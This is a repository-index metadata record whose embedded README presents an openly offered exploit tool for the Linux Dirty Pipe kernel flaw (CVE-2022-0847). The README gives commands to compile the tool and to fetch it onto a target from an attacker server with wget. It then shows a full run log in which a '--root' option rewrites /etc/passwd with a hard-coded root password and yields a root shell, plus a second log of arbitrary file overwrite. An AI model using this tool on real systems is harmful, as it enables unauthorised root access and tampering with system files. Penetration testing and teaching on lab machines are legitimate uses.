{"id":18704788,"url":"https://github.com/n3rada/dirtypipe","last_synced_at":"2025-07-03T07:07:16.549Z","repository":{"id":200385095,"uuid":"705367804","full_name":"n3rada/DirtyPipe","owner":"n3rada","description":"Working Dirty Pipe (CVE-2022-0847) exploit tool with root access and file overwrites.","archived":false,"fork":false,"pushed_at":"2023-10-15T22:23:44.000Z","size":356,"stargazers_count":5,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2024-04-24T07:46:36.598Z","etag":null,"topics":["cve-2022-0847","dirty-pipe","kernel-exploit","pentesting","unix"],"latest_commit_sha":null,"homepage":"","language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/n3rada.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null}},"created_at":"2023-10-15T20:13:11.000Z","updated_at":"2024-04-08T04:48:57.000Z","dependencies_parsed_at":null,"dependency_job_id":"746b9c03-b9f6-4006-8be1-7cecf038e01b","html_url":"https://github.com/n3rada/DirtyPipe","commit_stats":null,"previous_names":["n3rada/dirtypipe"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/n3rada%2FDirtyPipe","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/n3rada%2FDirtyPipe/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/n3rada%2FDirtyPipe/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/n3rada%2FDirtyPipe/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/n3rada","download_url":"https://codeload.github.com/n3rada/DirtyPip
e/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":223510320,"owners_count":17157306,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cve-2022-0847","dirty-pipe","kernel-exploit","pentesting","unix"],"created_at":"2024-11-07T12:08:20.543Z","updated_at":"2024-11-07T12:08:21.059Z","avatar_url":"https://github.com/n3rada.png","language":"C","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Dirty Pipe Exploit: CVE-2022-0847\nThe Dirty Pipe vulnerability, also known as CVE-2022-0847, is a significant flaw within the Linux kernel. This repository provides an adapted version of the widely used exploit code to make it more user-friendly and modular.\n\nA very good explanation of this vulnerability can be found on the [HackTheBox blog](https://www.hackthebox.com/blog/Dirty-Pipe-Explained-CVE-2022-0847). Max Kellermann's original, more detailed explanation can be found [on his blog](https://dirtypipe.cm4all.com/).\n\nThis adapted version is segmented into different methods to increase modularity and ease of modification. Notably, there is an added `--root` option that modifies the /etc/passwd file to gain root access with the password `el3ph@nt!`.\n\nCompile the exploit statically:\n```shell\ngcc -o dpipe dpipe.c -static\n```\n\nThen retrieve it from your target before launching it:\n```shell\nyoan@teecup:~$ wget http://YOUR_SERVER_ADDRESS/unix/cve/dpipe\n--2023-10-15 20:07:44--  http://YOUR_SERVER_ADDRESS/unix/cve/dpipe\nConnecting to YOUR_SERVER_ADDRESS:80... 
connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 769792 (752K) [text/plain]\nSaving to: ‘dpipe’\n\ndpipe                                   100%[=============================================================================\u003e] 751.75K  --.-KB/s    in 0.09s\n\n2023-10-15 20:07:44 (8.09 MB/s) - ‘dpipe’ saved [769792/769792]\n\nyoan@teecup:~$ chmod +x dpipe\nyoan@teecup:~$ ./dpipe --root\n[Dirty Pipe] Attempting to backup '/etc/passwd' to '/tmp/passwd.bak'\n[Dirty Pipe] Successfully backed up '/etc/passwd' to '/tmp/passwd.bak'\n[Dirty Pipe] Initiating write to '/etc/passwd'...\n[Dirty Pipe] Data size to write: 131 bytes\n[Dirty Pipe] File '/etc/passwd' opened successfully for reading.\n[Dirty Pipe] Pipe size determined: 65536 bytes\n[Dirty Pipe] Filling the pipe...\n[Dirty Pipe] Pipe filled successfully.\n[Dirty Pipe] Draining the pipe...\n[Dirty Pipe] Pipe drained successfully.\n[Dirty Pipe] Data successfully written to '/etc/passwd'.\n[Dirty Pipe] You can connect as root with password 'el3ph@nt!'\n[Dirty Pipe] Program execution completed successfully.\nyoan@teecup:~$\nyoan@teecup:~$ cat /etc/passwd\nroot:$6$9WETWbCBTQ8pxg4I$odZAx8iIlayCnFdUwDM5dHVfsXXZo1RHRp2a4uQzcPDkRiTJYLA4loZESihn4ASGhWKN9.RWPT.CZJdyfTej4/:0:0:root:/root:/bin/sh\n:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System 
(admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n_apt:x:100:65534::/nonexistent:/usr/sbin/nologin\nsystemd-network:x:101:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin\nsystemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin\nmessagebus:x:103:104::/nonexistent:/usr/sbin/nologin\nsshd:x:104:65534::/run/sshd:/usr/sbin/nologin\nyoan:x:1000:1000::/home/yoan:/bin/bash\nyoan@teecup:~$ su root\nPassword:\n# cd /root\n# cat flag.txt\nGreat job! You found me.\n```\n\nYou can also use the exploit to overwrite content in other files:\n```shell\nyoan@teecup:~$ echo \"Vxxx\" \u003e dirty\nyoan@teecup:~$ cat dirty\nVxxx\nyoan@teecup:~$ ./dpipe dirty 1 uln\n[Dirty Pipe] Standard file overwrite mode detected...\n[Dirty Pipe] Attempting to backup 'dirty' to '/tmp/dirty.bak'\n[Dirty Pipe] Successfully backed up 'dirty' to '/tmp/dirty.bak'\n[Dirty Pipe] Initiating write to 'dirty'...\n[Dirty Pipe] Data size to write: 3 bytes\n[Dirty Pipe] File 'dirty' opened successfully for reading.\n[Dirty Pipe] Pipe size determined: 65536 bytes\n[Dirty Pipe] Filling the pipe...\n[Dirty Pipe] Pipe filled successfully.\n[Dirty Pipe] Draining the pipe...\n[Dirty Pipe] Pipe drained successfully.\n[Dirty Pipe] Data successfully written to 'dirty'.\n[Dirty Pipe] Program execution completed successfully.\nyoan@teecup:~$ cat dirty\nVuln\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fn3rada%2Fdirtypipe","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fn3rada%2Fdirtypipe","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fn3rada%2Fdirtypipe/lists"}